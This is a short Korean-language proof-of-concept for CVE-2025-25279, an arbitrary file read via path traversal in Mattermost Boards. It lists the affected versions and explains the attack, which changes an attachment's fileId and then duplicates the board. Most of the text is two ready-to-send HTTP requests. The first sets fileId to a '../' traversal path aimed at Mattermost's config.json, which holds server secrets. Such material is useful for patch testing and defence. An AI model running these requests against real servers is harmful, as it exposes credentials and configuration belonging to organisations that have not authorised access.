
CVE-2025-25279에 대한 개념 증명: Mattermost Boards의 path traversal로 조작된 가져오기 아카이브 및 게시판 복제를 통해 임의 파일 읽기 허용
Mattermost Boards에 파일을 업로드한 후, fileId 매개변수가 수정되고 보드가 복사되면, 파일은 매개변수에 지정된 대상 파일을 가리키며 다운로드됩니다.
영향 받는 버전: Boards가 활성화된 Mattermost 인스턴스 CVE: CVE-2025-25279
Mattermost 버전 10.4.x <= 10.4.1, 9.11.x <= 9.11.7, 10.3.x <= 10.3.2, 10.2.x <= 10.2.2는 보드를 가져올 때 보드 블록을 제대로 검증하지 못하여, 공격자가 Boards에서 특별히 조작된 가져오기 아카이브를 가져오고 내보내는 것을 통해 시스템의 임의 파일을 읽을 수 있습니다.

POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks HTTP/1.1
Host: localhost:8065
Content-Length: 403
Authorization:
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive
[{"id":"7gni7t3q3gj6unkq49mpb3xzdre","schema":1,"boardId":"bqgcxem5wo3ncfxkbfn5rkawxcr","parentId":"crc1qdykm1pg4mbfpct45qnyorw","createdBy":"","modifiedBy":"","type":"attachment","fields":{"fileId":"../../../../../../../mattermost/config/config.json"},"title":"CVE-2025-25279.txt","createAt":1740423098470,"updateAt":1740423098470,"deleteAt":0,"limited":false,"isUploading":false,"uploadingPercent":0}]
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks/crc1qdykm1pg4mbfpct45qnyorw/duplicate?asTemplate=false HTTP/1.1
Host: localhost:8065
Content-Length: 0
Authorization:
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive
크레딧은 제 것이 아니며, 리뷰가 포함되어 있습니다.